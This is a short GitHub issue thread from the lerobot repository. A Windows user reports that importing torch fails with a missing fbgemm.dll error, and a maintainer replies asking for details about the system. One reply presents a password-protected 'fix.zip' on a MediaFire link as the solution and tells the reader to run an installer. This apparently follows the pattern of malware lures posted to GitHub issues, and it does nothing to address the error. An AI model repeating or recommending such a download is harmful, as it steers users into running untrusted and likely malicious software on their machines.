huggingface/lerobot #393: what can i do with the two bug ?

flying21, 2024-08-29:
### System Info

```Shell
what can i do with the two bug ?
```

### Information

- [X] One of the scripts in the examples/ folder of LeRobot
- [ ] My own task or dataset (give details below)

### Reproduction

1、$ python lerobot/scripts/visualize_dataset.py --repo-id lerobot/pusht --episode-index 0
Traceback (most recent call last):
  File "D:\user\download\github\lerobot-main\lerobot\scripts\visualize_dataset.py", line 73, in <module>
    import torch
  File "C:\python\miniconda3\envs\lerobot\lib\site-packages\torch\__init__.py", line 148, in <module>
    raise err
OSError: [WinError 126] 找不到指定的模块。 Error loading "C:\python\miniconda3\envs\lerobot\lib\site-packages\torch\lib\fbgemm.dll" or ondependencies.

2、C:\python\miniconda3\envs\lerobot\python.exe D:\user\download\github\lerobot-main\examples\1_load_lerobot_dataset.py 
Traceback (most recent call last):
  File "D:\user\download\github\lerobot-main\examples\1_load_lerobot_dataset.py", line 20, in <module>
    import torch
  File "C:\python\miniconda3\envs\lerobot\lib\site-packages\torch\__init__.py", line 148, in <module>
    raise err
OSError: [WinError 126] 找不到指定的模块。 Error loading "C:\python\miniconda3\envs\lerobot\lib\site-packages\torch\lib\fbgemm.dll" or one of its dependencies.

进程已结束，退出代码为 1

### Expected behavior

what can i do with the two bug ?

Anubi5x0, 2024-08-29:
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

aliberts, 2024-08-29:
Hello, this looks like an issue with your torch install.
Can you provide more info on your system?
- Are you on WSL?
- What version of cuda do you have?
- How did you install torch?
- How did you install lerobot?

closed 2024-10-11 by aliberts